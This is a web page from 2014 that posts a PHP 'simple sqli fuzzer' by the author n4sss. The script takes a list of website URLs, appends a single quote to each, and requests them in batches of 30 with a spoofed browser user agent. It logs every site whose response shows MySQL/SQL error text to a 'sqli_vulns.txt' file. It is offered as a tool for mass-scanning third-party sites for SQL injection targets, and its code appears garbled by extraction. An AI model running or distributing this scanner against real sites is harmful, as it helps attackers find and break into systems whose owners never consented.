facebook facebook twitter rss

Simple sqli fuzzer by n4sss

Author: n4sss , Published: 05-06-2014

<?php


/*
 * Simple sqli fuzzer by n4sss.
 * Just set a file with sites to test sqli in argv[1] | php sqli.php list.txt
 * Current threads (instances) : 30;
 * 
 * http://www.youtube.com/watch?v=NzCL9uLkQSI
 * King! (8)
 * Just listen.
 *
 * n-l4b[no_spam]hotmail[dot]com
 * 
 * */
 
 
set_time_limit(NULL);
error_reporting(NULL);

function 
check($file){
    
$number count(array_filter(explode("\n"file_get_contents($file))));
    return 
$number;
}

function 
sqli($host$threads$l){
            
$multi curl_multi_init();
            
$bol array_chunk($host$threads);
            
$cntz 1;
            foreach(
$bol as $site){
                    for(
$i=0;$i<=count($site)-1;$i++){
                            
$ch[$i] = curl_init();
                            
curl_setopt($ch[$i], CURLOPT_URL$site[$i].'\'');
                            
curl_setopt($ch[$i], CURLOPT_FOLLOWLOCATIONTRUE);
                            
curl_setopt($ch[$i], CURLOPT_RETURNTRANSFERTRUE);
                            
curl_setopt($ch[$i], CURLOPT_USERAGENT"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0");
                            
curl_setopt($ch[$i], CURLOPT_TIMEOUT8);
                            
curl_multi_add_handle($multi$ch[$i]);
                    }do{
                            
curl_multi_exec($multi$handle);usleep(1);}while($handle>0);
                            foreach(
$ch as $ch_id => $cnt)
                            {
                                    
$grep[$ch_id] = curl_multi_getcontent($cnt);
                                    
curl_multi_remove_handle($multi,$cnt);
                                    print 
"[$cntz] Fuzzing -> $site[$ch_id]\n";
                                    if(
preg_match('/Mysql_|SQL|mysql_num_rows()|mysql_fetch_assoc()|mysql_result()|mysql_fetch_array()|mysql_numrows()|mysql_preg_match()/',$grep[$ch_id]))
                                    {
                                            
$fp fopen($l"a");
                                                      
fwrite($fp$site[$ch_id]."\n");
                                                      
fclose($fp);
                                                      
flush();
                                    }
                                    
$cntz++;
                            }
                    }
    }
    
if(!
$argv[1]){
    print 
"+--------------------------------------------------+\n";
    print 
"|Simple Sqli Fuzzer by n4sss (CURL_MULTI)          |\n";
    print 
"|n4@m4gcLab~$ php sqli_fuzzer.php list.txt         |\n";
    print 
"+--------------------------------------------------+\n";
}else{
    print 
"\n############ Simple sqli fuzzer by n4sss ############\n";
    if(!
is_file("$argv[1]")) die("[-] FILE $argv[1] not found\n EXITING\n");
    
$host array_filter(explode("\n"file_get_contents("$argv[1]")));
    
$l "sqli_vulns.txt"// LOG
    
sqli($host30$l); // 30 "threads";
    
$number check($l);
    print 
"[] Fuzz ok n4sss!\n";
    print 
"We have -> ".$number." sites with sql error (:\n";
}
    
?>

Like us on Facebook :